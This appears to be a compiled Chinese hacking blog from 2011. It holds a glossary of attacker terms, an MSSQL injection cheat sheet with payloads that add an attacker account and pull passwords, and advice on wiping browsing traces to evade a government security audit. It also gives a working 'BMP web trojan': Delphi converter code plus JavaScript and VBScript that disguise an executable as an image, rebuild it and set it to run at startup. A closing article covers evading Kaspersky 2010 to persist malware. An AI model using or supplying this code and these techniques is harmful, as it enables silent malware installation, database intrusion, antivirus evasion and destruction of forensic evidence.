14.注入点:是可以实行注入的地方,通常是一个访问数据库的连接。根据注入点数据库的运行帐号的权限的不同,你所得到的权限也不同。

15.内网:通俗的讲就是局域网,比如网吧,校园网,公司内部网等都属于此类。查看IP地址如果是在以下三个范围之内的话,就说明我们是处于内网之中的:10.0.0.0—10.255.255.255,172.16.0.0—172.31.255.255,192.168.0.0—192.168.255.255 我以前讲过的,有没有用心读师傅教的东西,你可以自己测验下自己。

16.外网:直接连入INTERNET(互连网),可以与互连网上的任意一台电脑互相访问,IP地址不是保留IP(内网)IP地址。

17.端口:(Port)相当于一种数据的传输通道。用于接受某些数据,然后传输给相应的服务,而电脑将这些数据处理后,再将相应的恢复通过开启的端口传给对方。一般每一个端口的开放的偶对应了相应的服务,要关闭这些端口只需要将对应的服务关闭就可以了。

18.3389、4899肉鸡:3389是Windows终端服务(Terminal Services)所默认使用的端口号,该服务是微软为了方便网络管理员远程管理及维护服务器而推出的,网络管理员可以使用远程桌面连接到网络上任意一台开启了终端服务的计算机上,成功登陆后就会象操作自己的电脑一样来操作主机了。这和远程控制软件甚至是木马程序实现的功能很相似,终端服务的连接非常稳定,而且任何杀毒软件都不会查杀,所以也深受黑客喜爱。黑客在**了一台主机后,通常都会想办法先添加一个属于自己的后门帐号,然后再开启对方的终端服务,这样,自己就随时可以使用终端服务来控制对方了,这样的主机,通常就会被叫做3389肉鸡。Radmin是一款非常优秀的远程控制软件,4899就是Radmin默认使用也经常被黑客当作木马来使用(正是这个原因,目前的杀毒软件也对Radmin查杀了)。有的人在使用的服务端口号。因为Radmin的控制功能非常强大,传输速度也比大多数木马快,而且又不被杀毒软件所查杀,所用Radmin管理远程电脑时使用的是空口令或者是弱口令,黑客就可以使用一些软件扫描网络上存在Radmin空口令或者弱口令的主机,然后就可以登陆上去远程控制对恶劣,这样被控制的主机通常就被成做4899肉鸡。

19.免杀:就是通过加壳、加密、修改特征码、加花指令等等技术来修改程序,使其逃过杀毒软件的查杀。

20.加壳:就是利用特殊的算法,将EXE可执行程序或者DLL动态连接库文件的编码进行改变(比如实现压缩、加密),以达到缩小文件体积或者加密程序编码,甚至是躲过杀毒软件查杀的目的。目前较常用的壳有UPX,ASPack、PePack、PECompact、UPack、免疫007、木马彩衣等等。

21.花指令:就是几句汇编指令,让汇编语句进行一些跳转,使得杀毒软件不能正常的判断病毒文件的构造。说通俗点就是”杀毒软件是从头到脚按顺序来查找病毒。如果我们把病毒的头和脚颠倒位置,杀毒软件就找不到病毒了。

22.DDOS攻击:DDOS全名是Distributed Denial of service (分布式拒绝服务攻击),很多DOS攻击源一起攻击某台服务器就组成了DDOS攻击。这是书本概念很难理解,你可以理解成给一个指定IP发大量流量包, 就会导致这个IP卡,甚至掉线等。通俗点讲,就是这个样子,DDOS攻击在远控中一般叫压力测试,我给你们的远控有的也带这个功能, DDOS攻击模式有很多种, 自己看下吧,以后用到在讲解。 什么是TCP/IP 是一种网络通信协议,他规范了网络上所有的通信设备,尤其是一个主机与另一个主机之间的数据往来格式以及传送方式.,TCP/IP是INTERNET的基础协议,也是一种电脑数据打包和寻址的标准方法.在数据传诵中,可以形象地理解为两个信封,TCP和IP就像是信封,要传递的信息被划为若干段,每一段塞入一个TCP信封,并在该信封面上记录有分段号的信息,再将TCP信封塞入IP大信封,发送上网. 什么是路由器 路由器应该是在网络上使用最高的设备之一了,它的主要作用就是路由选路,将IP数据包正确的送到目的地,因此也叫IP路由器. 什么是蜜罐 好比是情报收集系统.蜜罐好象是故意让人攻击的目标,引诱黑客来攻击,所有攻击者**后,你就可以知道他是如何得逞的,随时了解针对你的服务器发动的最新的攻击和漏洞.还可以通过窃听黑客之间的联系,收集黑客所用的种种工具,并且掌握他们的社交网络. 什么是拒绝服务攻击 DOS是DENIALOFSERVICE的简称,即拒绝服务,造成DOS的攻击行为被称为DOS攻击,其目的是使计算机或网络无法正常服务,最常见的DOS攻击有计算机网络宽带攻击和连通性攻击,连通性攻击指用大量的连接请求冲击计算机,使得所有可用的操作系统资源被消耗,最终计算机无法再处理合法用户的请求. 什么是脚本注入攻击(SQLINJECTION) 所谓脚本注入攻击者把SQL命令插入到WEB表单的输入域或也面请求的查学字符串,欺骗服务器执行恶意的SQL命令,在某些表单中,用户输入的内容直接用来构造动态的SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入式攻击. 什么是防火墙?它是如何确保网络安全的 使用防火墙(Firewall)是一种确保网络安全的方法。防火墙是指设置在不同网络(如可信任的企业内部网和不可信的公共网)或网络安全域之间的一系列部件的组合。它是不同网络或网络安全域之间信息的惟一出入口,能根据企业的安全政策控制(允许、拒绝、监测)出入网络的信息流,且本身具有较强的抗攻击能力。它是提供信息安全服务,实现网络和信息安全的基础设施。 什么是后门?为什么会存在后门? 后门(BackDoor)是指一种绕过安全性控制而获取对程序或系统访问权的方法。在软件的开发阶段,程序员常会在软件内创建后门以便可以修改程序中的缺陷。如果后门被其他人知道,或是在软件之前没有删除,那么它就成了安全隐患。

关于mssql数据库下的Sql注射技巧

时间:2011年10月30日作者:小侃评论次数:0

Sql的注射最早源于or1=1) 最重要的表名: select * from sysobjects sysobjects ncsysobjects sysindexes tsysindexes syscolumns systypes sysusers sysdatabases sysxlogins sysprocesses 最重要的一些用户名(默认sql数据库中存在着的) public dbo gues

Sql的注射最早源于’or’1’=’1)
最重要的表名:
select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses
最重要的一些用户名(默认sql数据库中存在着的)
public
dbo
guest(一般禁止,或者没权限)
db_sercurityadmin
ab_dlladmin
一些默认扩展
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia 驱动器相关
xp_dirtree 目录
xp_enumdsn ODBC连接
xp_loginconfig 服务器安全模式信息
xp_makecab 创建压缩卷
xp_ntsec_enumdomains domain信息
xp_terminate_process 终端进程,给出一个PID
例如:
sp_addextendedproc ’xp_webserver’, ’c:/temp/xp_foo.dll’
exec xp_webserver
sp_dropextendedproc ’xp_webserver’
bcp “select * FROM test..foo” queryout c:/inetpub/wwwroot/runcommand.asp -c -Slocalhost -Usa -Pfoobar
’ group by users.id having 1=1-
’ group by users.id, users.username, users.password, users.privs having 1=1-
’; insert into users values( 666, ’attacker’, ’foobar’, 0xffff )-
union   select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=’logintable’-
union   select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=’logintable’ where COLUMN_NAME NOT IN (’login_id’)-
union   select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=’logintable’ where COLUMN_NAME NOT IN (’login_id’,’login_name’)-
union   select TOP 1 login_name FROM logintable-
union   select TOP 1 password FROM logintable where login_name=’Rahul’–

对于删除上网痕迹的深入探讨

时间:2011年10月30日作者:小侃评论次数:0

 

呵呵,最近单位要接受上级保密部门的查检,首先要查的就是计算机是否一机双网(内、外网同时用,以前我写过一篇如果在一台电脑上同时上内、外网),而且听说用的是类似于上网痕迹监察取证系统的软件,我试了一下这个软件,真是了不得,下面是另一个的详细描

 

呵呵,最近单位要接受上级保密部门的查检,首先要查的就是计算机是否一机双网(内、外网同时用,以前我写过一篇如果在一台电脑上同时上内、外网),而且听说用的是类似于“上网痕迹监察取证系统”的软件,我试了一下这个软件,真是了不得,下面是另一个的详细描述:
最近遇到部门严查上网,对于如何删除上网痕迹,很多人停留在清除一些表面的东西,主要有以下几种:浏览器缓存的临时文件、浏览历史、Cookies、地址栏下拉列表等。对于初学者来说,清除了以上的内容,很难发现电脑上网的记录。但是大家都知道,删除文件其实只是删除了磁盘索引列表而已,就好像只把一本书的目录撕掉,让人看目录的时候找不到内容,其实内容还是存在在磁盘里的。磁盘里存储是以“族”的形式存储的,只要用一些专用的工具就能找出残留在磁盘里的残留数据,如果把族的特征码定位为“www”或者“。com”,就能很快地找出带有这些特征码的族,也就是上网的痕迹,找到族的建立时间,就能知道准确的上网时间。
其中常用的族查找工具主要有两个,一个是“‘猎隼’涉密计算机上网监察取证系统”,还有一个是“URL上网痕迹检查清理工具”。这两种工具都支持强力搜索功能,也就是所谓的族查找功能。别小看这个功能,可以毫不夸张的说,它可以找出从你电脑第一次连接上网到现在为止残留在磁盘里的族,包括上网时间、浏览地址、下载的临时文件。无论你硬盘经过多少次普通格式化,多少次重装系统,多少次重新分区都是无用的,除非缓存的族被新的文件覆盖而改变,否则浏览痕迹一览无余。我在家里的电脑试了一下,居然能找到三年前的记录,上网记录多达5000多条!!要知道,我基本上每两个月就装装新的系统,买电脑到现在,重新分区过两次。太可怕了,惊叹现在的检测技术真是…不知道用什么词语来形容了。
有办法删除痕迹吗?答案是肯定的。知道了原理,要达到目的就成功了一半。“URL上网痕迹检查清理工具”和一些例如“Clean Disk Security”的清除工具本身提供的清理功能只能删除一部分,无法完全清空,所以最有效的办法就是低
格了。虽然说有危险,但是不妨一试。在低格后,重新分区(我就分一个区),格式化为NTFS,用工具查,仍然查出500多条记录,不过记录数量大幅度减少。接下来用“Clean Disk Security”进行删除,可以选用不同的清除方式多执行几次
,基本上可以完全抹除残留的记录。其原理就是在磁盘空白的区域反复写入垃圾内容,写入的次数越多,残留的信息族就越少。最后再在PQ里删除磁盘,这样新的硬盘就诞生了,里面什么残留数据都没有(通电时间除外,可以用工具修改)
。最后拿到机器上重新分区、格式化、装系统,完全查不出任何的上网记录。但是这里要注意的是,装系统的时候一定要用安装版的装,如果用GHOST版的,原来做GHOST之前的信息也会写入磁盘,也会有记录的。装系统前记得在BIOS里吧时间提前,装好以后再修改回来。
话说回来,想要上网又不留下痕迹有没有办法呢?有!只要装两个系统,一个用于工作,一个用于上网,于上网的系统最好要装在硬盘的最后一个分区,非常时刻就用PQ将最后的分区屏蔽,即便启动项里有两个系统,最后分区的系统是进不去的,因为已经屏蔽了。更不放心你就装一个虚拟机,把虚拟机文件放在可移动磁盘里,那么所有上网的记录都在虚拟机的文件里,并且在移动设备里,本机不留下任何记录,当然也可以放在一个小分区里,检查时候屏蔽,比较麻烦点就是。
呵呵,我的办法很简单,换硬盘!

 

 

木马传播新方式介绍

时间:2011年10月30日作者:小侃评论次数:0

标题:木马传播新方式介绍
作者:小侃
博客:www.chnxiaokan.com
何谓BMP网页木马?它和过去早就用臭了的MIME头漏洞的木马不同,MIME木马是把一个EXE文件用MIME编码为一个EML(OUT
LOOK信件)文件,放到网页上利用IE和OE的编码漏洞实现自动下载和执行.
然而BMP木马就不同,它把一个EXE文件伪装成一个BMP图片文件,欺骗IE自动下载,
何谓BMP网页木马?它和过去早就用臭了的MIME头漏洞的木马不同,MIME木马是把一个EXE文件用MIME编码为一个EML(OUT
LOOK信件)文件,放到网页上利用IE和OE的编码漏洞实现自动下载和执行.

然而BMP木马就不同,它把一个EXE文件伪装成一个BMP图片文件,欺骗IE自动下载,再利用网页中的JAVASCRIPT脚本查找客户端的Internet临时文件夹,找到下载后的BMP文件,把它拷贝到TEMP目录.再编写一个脚本把找到的BMP文件用DEBUG还原成EXE,并把它放到注册表启动项中,在下一次开机时执行.但是这种技术只能在9X下发挥作用,对于2K,XP来说是无能为力了.

看上去好象很复杂,下面我们一步一步来:

EXE变BMP的方法.

大家自己去查查BMP文件资料就会知道,BMP文件的文件头有54个字节,简单来说里面包含了BMP文件的长宽,位数,文件大小,数据区长度,我们只要在EXE文件的文件头前面添加相应的BMP文件头(当然BMP文件头里面的数据要符合EXE文件的大小啦),这样就可以欺
骗IE下载该BMP文件,开始我们用JPG文件做过试验,发现如果文件头不正确的话,IE是不会下载的,转换代码如下:

program exe2bmp;
uses
Windows,
SysUtils;
var len,row,col,fs:
DWORD;
buffer: array[0..255]of char;
fd: WIN32_FIND_DATA;
h,hw:
THandle;
begin
if (ParamStr(1)<>”) and(ParamStr(2)<>”)
then begin //如果运行后没有两个参数则退出
if FileExists(ParamStr(1)) then begin

FindFirstFile(Pchar(ParamStr(1)),fd);
fs:=fd.nFileSizeLow;
col :=
4;
while true do begin
if (fs mod 12)=0 then begin
len:=fs;
end
else len:=fs+12-(fs mod 12);
row := len div col div 3;
if row>col
then begin
col:=col+4;
end else Break;
end;

FillChar(buffer,256,0);
{一下为BMP文件头数据}
Buffer[0]:=’B’;Buffer[1]:=’M’;

PDWORD(@buffer[18])^:=col;
PDWORD(@buffer[22])^:=row;

PDWORD(@buffer[34])^:=len;
PDWORD(@buffer[2])^:=len+54;

PDWORD(@buffer[10])^:=54;
PDWORD(@buffer[14])^:=40;

PWORD(@buffer[26])^:=1;
PWORD(@buffer[28])^:=24;
{写入文件}

hw:=CreateFile(Pchar(ParamStr(2)),GENERIC_WRITE,FILE_SHARE_READ or
FILE_SHARE_WRITE,nil,CREATE_ALWAYS,0,0);

h:=CreateFile(Pchar(ParamStr(1)),GENERIC_READ,FILE_SHARE_READ or
FILE_SHARE_WRITE,nil,OPEN_EXISTING,0,0);
WriteFile(hw,buffer,54,col,0);

repeat
ReadFile(h,buffer,256,col,0);
WriteFile(hw,buffer,col,col,0);

untilcol<>256;
WriteFile(hw,buffer,len-fs,col,0);

CloseHandle(h);
CloseHandle(hw);
end;
end;
end.

以上代码可以在DELPHI4,5,6中编译 ,就可以得到一个exe2bmp.exe文件.大家打开MSDOS方式,输入exe2bmp myexe.exe
mybmp.bmp回车就可以把第二个参数所指定的EXE文件转换成BMP格式.

内容导航

接着就是把这个BMP图片放到网页上了,如果大家打开过这张图片的话,一定发现这张BMP又花,颜色又单调.所以大家放在网页上最好用这样的格式

<img srd=”mybmp.bmp” higth=”0″ width=”0″>

以下是放在网页上的脚本

document.write(‘ ‘);
function docsave()
{
a=document.applets[0];

a.setCLSID(‘{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}’);

a.createInstance();
wsh=a.GetObject();

a.setCLSID(‘{0D43FE01-F093-11CF-8940-00A0C9054228}’);

a.createInstance();
fso=a.GetObject();
var
winsys=fso.GetSpecialFolder(1);
var vbs=winsys+’\s.vbs’;
wsh.RegWrite

(‘HKCU\Software\Microsoft\Windows\CurrentVersion\Run\vbs’,’wscript
‘+'”‘+vbs+'” ‘);
var st=fso.CreateTextFile(vbs,true);

st.WriteLine(‘Option Explicit’);
st.WriteLine(‘Dim FSO,WSH,CACHE,str’);

st.WriteLine(‘Set FSO = CreateObject(“Scripting.FileSystemObject”)’);

st.WriteLine(‘Set WSH = CreateObject(“WScript.Shell”)’);

st.WriteLine(‘CACHE=wsh.RegRead(“HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders\Cache”)’);

st.WriteLine(‘wsh.RegDelete(“HKCU\Software\Microsoft\Windows\CurrentVersion\Run\vbs”)’);

st.WriteLine (‘wsh.RegWrite
“HKCU\Software\Microsoft\Windows\CurrentVersion\Run\tmp”,”tmp.exe”‘);

st.WriteLine(‘SearchBMPFile fso.GetFolder(CACHE),”mybmp[1].bmp”‘);

st.WriteLine(‘WScript.Quit()’);
st.WriteLine(‘Function
SearchBMPFile(Folder,fname)’);
st.WriteLine(‘ Dim
SubFolder,File,Lt,tmp,winsys’);
st.WriteLine(‘
str=FSO.GetParentFolderName(folder) & “\” & folder.name & “\” &
fname’);
st.WriteLine(‘ if FSO.FileExists(str) then’);
st.WriteLine(‘
tmp=fso.GetSpecialFolder(2) & “\”‘);
st.WriteLine(‘
winsys=fso.GetSpecialFolder(1) & “\”‘);
st.WriteLine(‘ set
File=FSO.GetFile(str)’);
st.WriteLine(‘ File.Copy(tmp & “tmp.dat”)’);

st.WriteLine(‘ File.Delete’);
st.WriteLine(‘ set
Lt=FSO.CreateTextFile(tmp & “tmp.in”)’);
st.WriteLine(‘
Lt.WriteLine(“rbx”)’);

st.WriteLine(‘ Lt.WriteLine(0)’); st.WriteLine(‘
Lt.WriteLine(rcx)’); st.WriteLine(‘ Lt.WriteLine(1000)’); st.WriteLine(‘
Lt.WriteLine(w136)’); st.WriteLine(‘ Lt.WriteLine(q)’); st.WriteLine(‘
Lt.Clo

 

st.WriteLine(‘
Lt.WriteLine(“0”)’);
st.WriteLine(‘ Lt.WriteLine(“rcx”)’);

st.WriteLine(‘ Lt.WriteLine(“1000”)’);
st.WriteLine(‘
Lt.WriteLine(“w136”)’);
st.WriteLine(‘ Lt.WriteLine(“q”)’);

st.WriteLine(‘ Lt.Close’);
st.WriteLine(‘ WSH.Run “command /c debug ”
& tmp & “tmp.dat <” & tmp & “tmp.in >” & tmp &
“tmp.out”,false,6’);
st.WriteLine(‘ On Error Resume Next ‘);

st.WriteLine(‘ FSO.GetFile(tmp & “tmp.dat”).Copy(winsys &
“tmp.exe”)’);
st.WriteLine(‘ FSO.GetFile(tmp & “tmp.dat”).Delete’);

st.WriteLine(‘ FSO.GetFile(tmp & “tmp.in”).Delete’);
st.WriteLine(‘
FSO.GetFile(tmp & “tmp.out”).Delete’);
st.WriteLine(‘ end if’);

st.WriteLine(‘ If Folder.SubFolders.Count <> 0 Then’);

st.WriteLine(‘ For Each SubFolder In Folder.SubFolders’);
st.WriteLine(‘
SearchBMPFile SubFolder,fname’);
st.WriteLine(‘ Next’);
st.WriteLine(‘
End If’);
st.WriteLine(‘End Function’);
st.Close();
}

setTimeout(‘docsave()’,1000); 

把该脚本保存为”js.js”,在网页中插入:<script src=”js.js”></script>

内容导航

该脚本主要会在本地机器的SYSTEM目录下生成一个“S.VBS”文件,该脚本文件会在下次开机时自动运行。主要用于从临时目录中找出mybmp[1].bmp文件。

“S.VBS”文件主要内容如下:

Option Explicit
Dim FSO,WSH,CACHE,str
Set FSO =
CreateObject(“Scripting.FileSystemObject”)
Set WSH =
CreateObject(“WScript.Shell”)

CACHE=wsh.RegRead(“HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders\Cache”)

wsh.RegDelete(“HKCU\Software\Microsoft\Windows\CurrentVersion\Run\vbs”)

wsh.RegWrite
“HKCU\Software\Microsoft\Windows\CurrentVersion\Run\tmp”,”tmp.exe”

SearchBMPFile fso.GetFolder(CACHE),”mybmp[1].bmp”
WScript.Quit()

Function SearchBMPFile(Folder,fname)
Dim SubFolder,File,Lt,tmp,winsys

‘从临时文件夹中查找目标BMP图片
str=FSO.GetParentFolderName(folder) & “\” &
folder.name & “\” & fname
if FSO.FileExists(str) then

tmp=fso.GetSpecialFolder(2) & “\”
winsys=fso.GetSpecialFolder(1)
& “\”
set File=FSO.GetFile(str)
File.Copy(tmp & “tmp.dat”)

File.Delete
‘生成一个DEBUG脚本
set Lt=FSO.CreateTextFile(tmp &
“tmp.in”)
Lt.WriteLine(“rbx”)
Lt.WriteLine(“0”)
Lt.WriteLine(“rcx”)

‘下面一行的1000是十六进制,换回十进制是4096(该数字是你的EXE文件的大小)
Lt.WriteLine(“1000”)

Lt.WriteLine(“w136”)
Lt.WriteLine(“q”)
Lt.Close
WSH.Run “command
/c debug ” & tmp & “tmp.dat <” & tmp &”tmp.in>” & tmp
& “tmp.out”,false,6
On Error Resume Next
FSO.GetFile(tmp &
“tmp.dat”).Copy(winsys & “tmp.exe”)
FSO.GetFile(tmp &
“tmp.dat”).Delete
FSO.GetFile(tmp & “tmp.in”).Delete
FSO.GetFile(tmp
& “tmp.out”).Delete
end if
If Folder.SubFolders.Count <> 0
Then
For Each SubFolder In Folder.SubFolders
SearchBMPFile
SubFolder,fname
Next
End If
End Function

这个脚本会找出在临时文件夹中的bmp文件,并生成一个DEBUG的脚本,运行时会自动从BMP文件54字节处读去你指定大小的数据,并把它保存到tmp.dat中.后面的脚本再把它复制到SYSTEM的目录下.这个被还原的EXE文件会在下次重起的时候运行.这就是BMP木马的基本实现过程.

针对卡巴斯基2010的免杀探讨

时间:2011年10月30日作者:小侃评论次数:0

[hide]标题:针对卡巴斯基2010的免杀探讨

作者:小侃

博客:www.chnxiaokan.com

卡巴斯基2010在针对数字签名和系统文件防护变的非常严格,注册表更不说,经过这么多年的升级基本上没有可以利用的价值,卡巴斯基2010之前版本可以通过修改感染系统文件进行启动,绕过监控,只需要给PE文件添加一个数字签名,由于卡吧监控并不严格只是判断是

卡巴斯基2010在针对数字签名和系统文件防护变的非常严格,注册表更不说,经过这么多年的升级基本上没有可以利用的价值,卡巴斯基2010之前版本可以通过修改感染系统文件进行启动,绕过监控,只需要给PE文件添加一个数字签名,由于卡吧监控并不严格只是判断是否加了签名,而没有判断签名是否正确,所以给很多马留了生存空间。

但是,卡巴2010后的版本就没有这么幸运了,对系统目录文件的验证变的十分严格,即使想用程序给系统目录的文件改个名字,也会被提示风险软件,而主要的几种启动方式例如 服务启动,Winlogon启动,ActiveX,感染系统文件,DLL劫持,替换SVCHOST等等,已经无计可实了。

下面简单分析这几种启动方式死法

1.服务启动方面,注册服务的最终都要写注册表,以前可以直接写,后来导入注册表,再后来通过RegRestoreKey恢复,最最后HIV文件分析,现在怎么写也写不进去了,死了。

2.Winlogon这个启动方式非常好在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify项下面创建一个子键加上要启动的项名称在DllName中加上自己的DLL为DLL导出几个函数系统启动时会由Winlogon加载启动稳定是没得说,不过修改注册表这一步以经没办法实现了,实在可惜。

3.ActiveX目前还有可以利用的价值,不过要好好想想哈

4.DLL劫持一直被称为神奇的马甲,但由于卡巴2010开始对系统文件目录的严格查杀,劫持也变的非常不容易了IE还可以利用,在IE的目录里把原DLL 改名自己的DLL 放进去然后发函数转发到原DLL ,由于IE目录是Program Files目录而非%Windows%所以进行劫持还是可取的,而且穿透防火墙的效果好,你没见所有的防火墙直接就能放行吗?但缺点也很明显,只有用户启动IE的时候你的DLL才会被加载。本文作者 冷风

5.SVCHOST服务启动,首先要区分SVCHOST启动与普通服务启动。SVCHOST是唯一可以与IE颦美的方式,由于DNS服务的域名解析是由SVCHOST进程启动的所以他必须连接网络。而让SVCHOST加载自己的DLL 是一个非常好方式,比如前些时间流行的替换BITS服务就是,还可以过主动防御。SVCHOST自己创建一个分组的话是最稳定的,得会多出一个SVCHOST进程出来。哎,缺点必须动注册表。

对启动方式 大概说一下 方便后面启动的理解,看一下上面主流的启动方式基本上以经被封杀的无路可以走了,而其它还有一些加载方法属于某些人自己的神兵利器。如果别人不爆,想搞到也要大费力气 。还是就上面几种方式说说思路吧

首先就对修改注册表启动这一块想过2010以经是不太可能的了,这些启动方式中除去跟注册表有关系的就是 DLL劫持与PE感染了,PE感染可以让系统文件加载我们自己的DLL 与DLL劫持实现不同但效果基本一样,但这两种方法两关要过,其一是系统的WFP文件保护功能,其二就是卡巴2010对系统文件夹的保护了,对于系统的WPW功能你可以通过调用sfc_os_dl中的的第5个函数来关闭以前有人说要让winlogon来执行,才能关闭其实不用,你可以直接调用,当然这个功能以被卡吧看住了只要你一调用他就杀你,解决方法是你把这个功能实现写到DLL里面,然后导出一个函数,你的程序加载这个DLL 再调用,这样卡巴虽然很牛但也不能知道你的函数是什么导出格式,有几个参数,所以他模拟也模拟不出,就行了。

然后就是与卡巴的正面交锋了,这Y的很猛的,首先他会使劲检测你的程序 看是不是跟windows里的系统文件有染,一但发就直接喀嚓了,所以一定要小心就算是使用GetWindowsDirectory之类的也要小心啦,卡巴同志这时候正瞪着眼睛看着你呢,比如你想使用把MoveFileEx把里面的文件改个名,然后把自己的文件CopyFile 或者 MoveFile进去,那就完蛋了,卡巴会直接报一个Install Windows风险,为什么会报Install Windows风险呢?就是因为你动系统目录的文件了,不过他也不能太苛刻毕竟很多的正常的软件也要访问,如何解决这个鸟?通过批处理BAT行不?我试了不行。本文作者 冷风

我通过另一个办法简单模拟了一下可以实现,其实很简单啦,本文作者 冷风,方法就是你把要访问系统目录的功能分开来写,比如你要替换Usp10.dll然后通过启动Http SSL服务来启动你的马,那你在关闭系统的文件保护之后,必须把原来的Usp10.dll改名,然后才能把自己的DLL 拷贝进来,这时你要注意,给Usp10.dll改名和拷贝自己的文件不能在一个PE中完成,你可以把 改名这个操作放到 RenameUSP.EXE中把拷贝DLL放到WriteDll.EXE中然后 想法调用这两个EXE这样每个EXE单独操作,卡巴针对每个EXE执行的时候不会报警,但合到一块操作就会报警,还有不嫌麻烦的话把这些操作封装到DLL再调用。本文作者 冷风

在测试卡巴的中途我把半成品拿到瑞星的2010测试了一下,发现主动防御可以直接过去啦,看来瑞星还要努力啊,不过我喜欢瑞星,只要自己手工配置一下,杜绝95%的马能跑起来还是完全没有问题的^_^如果你要过瑞星的话要注意明文字符串,比如你在搞一个劫持LPK.DLL进行启动的马,那你最好不要在代码出出现 TCHAR szHijiackDll[]=_T(“LPK.DLL”)这样的代码,因为瑞星好像会扫这个东西然后直接给你报一个Win32.FakeLPK还是简单加密一下啦,就算用_tcscat连接也好哈。本文作者 冷风

还有一点,我还没能确定,卡巴在关方有一个列表,这个列表中的软件呢,就算没有数字签名,也会被认为是安全的软件,他会把运行的文件对这个列表对比,有的话就直接放行了,这是一个人性化的操作,是否有可以利用的价值还需要研究呐,你想如果不连接网络的话,卡巴怎么处理他会不会放松检查的严格成度来保证软件的兼容性?在测试时我给EXE随便加了一个签名,然后断网运行,发现原来报警,断网却没有报警。这个没有严格测试有朋友感兴趣就自己测试一下吧。本文作者 冷风

嗯,驱动很热门啊,用驱动搞死它行不?行啊!!不过,但是,可是……就算是神枪手要杀人也得有出枪的机会,但是卡巴大叔不会给你这个机会,所以这个想法还是放弃的好。驱动嘛还是用来做安全盾牌吧,进了驱动就是天堂,但是杀毒软件在进天堂的紧要关口都设了埋伏,所以我们还是从R3下地狱好了,R3下虽然很崎岖但毕竟路很多。
[/hide]